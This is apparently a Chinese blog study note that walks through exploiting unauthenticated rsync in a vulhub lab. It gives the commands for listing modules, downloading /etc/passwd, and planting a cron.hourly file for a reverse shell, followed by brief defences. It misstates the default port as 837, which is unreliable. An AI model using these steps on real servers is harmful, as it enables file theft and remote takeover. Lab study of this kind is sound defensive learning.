未授权访问:Rsync 未授权访问漏洞

目录

1、漏洞原理

2、环境搭建

3、未授权访问

4、利用rsync下载任意文件

5、利用rsync反弹shell

防御手段


今天继续学习各种未授权访问的知识和相关的实操实验,一共有好多篇,内容主要是参考先知社区的一位大佬的关于未授权访问的好文章,还有其他大佬总结好的文章:

这里附上大佬的好文章链接:常见未授权访问漏洞总结 - 先知社区

我在这只是学习大佬总结好的相关的知识和实操实验,那么废话不多说,开整。

第九篇是关于Rsync的未授权访问

1、漏洞原理

Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。

Rsync 默认允许匿名访问,**如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。**Rsync 的默认端口为 837。

2、环境搭建

复制代码
#利用DownGit下载https://github.com/vulhub/vulhub/tree/master/rsync/common
DownGit网址:https://minhaskamal.github.io/DownGit/#/home

上传文件到靶机并进行解压

复制代码
unzip common.zip

编译并启动docker容器

复制代码
cd common/
docker-compose build && docker-compose up -d

3、未授权访问

复制代码
rsync rsync://172.16.2.250:873/
rsync rsync://172.16.2.250:873/src

可以看到成功的未授权访问到了Rsync的src问价爱你

4、利用rsync下载任意文件

复制代码
rsync rsync://172.16.2.250:873/src/etc/passwd ./

5、利用rsync反弹shell

下载crontab配置文件

复制代码
rsync rsync://172.16.2.250:873/src/etc/crontab ./
复制代码

写入bash并赋权

复制代码
vim nc
chmod 777

将文件上传至/etc/cron.hourly

复制代码
rsync -av nc rsync://172.16.2.250:873/src/etc/cron.hourly

本地监听9999

复制代码
nc -lnvp 9999

等待一会,可以看到反弹成功了。

防御手段

  • -账户认证:正确配置认证用户名及密码。
  • -权限控制:使用合理的权限。
  • -网络访问控制:控制接入源ip。
  • -数据加密传输等

到此Rsync未授权访问漏洞的基础知识也就暂时学习到这里了,后面还有很多的未授权访问知识等着我去学习,我们下次见(*^▽^*)

相关推荐
迎風吹頭髮2 小时前
UNIX下C语言编程与实践58-UNIX TCP 连接处理:accept 函数与新套接字创建
c语言·网络·unix
毕设源码-郭学长4 小时前
【开题答辩全过程】以 安全培训信息管理平台为例,包含答辩的问题和答案
安全
猫头虎6 小时前
如何查看局域网内IP冲突问题?如何查看局域网IP环绕问题?arp -a命令如何使用?
网络·python·网络协议·tcp/ip·开源·pandas·pip
jieyu11196 小时前
网络、主机安全扫描工具
linux·安全·系统安全
FIN66687 小时前
昂瑞微冲刺科创板:创新驱动,引领射频芯片国产化新征程
前端·安全·前端框架·信息与通信·芯片
hello_2509 小时前
动手模拟docker网络-bridge模式
网络·docker·桥接模式
武文斌779 小时前
项目学习总结:LVGL图形参数动态变化、开发板的GDB调试、sqlite3移植、MQTT协议、心跳包
linux·开发语言·网络·arm开发·数据库·嵌入式硬件·学习
爱吃喵的鲤鱼9 小时前
仿mudou——Connection模块(连接管理)
linux·运维·服务器·开发语言·网络·c++
爱吃小胖橘10 小时前
Unity网络开发--超文本传输协议Http(1)
开发语言·网络·网络协议·http·c#·游戏引擎
萧鼎10 小时前
Python schedule 库全解析:从任务调度到自动化执行的完整指南
网络·python·自动化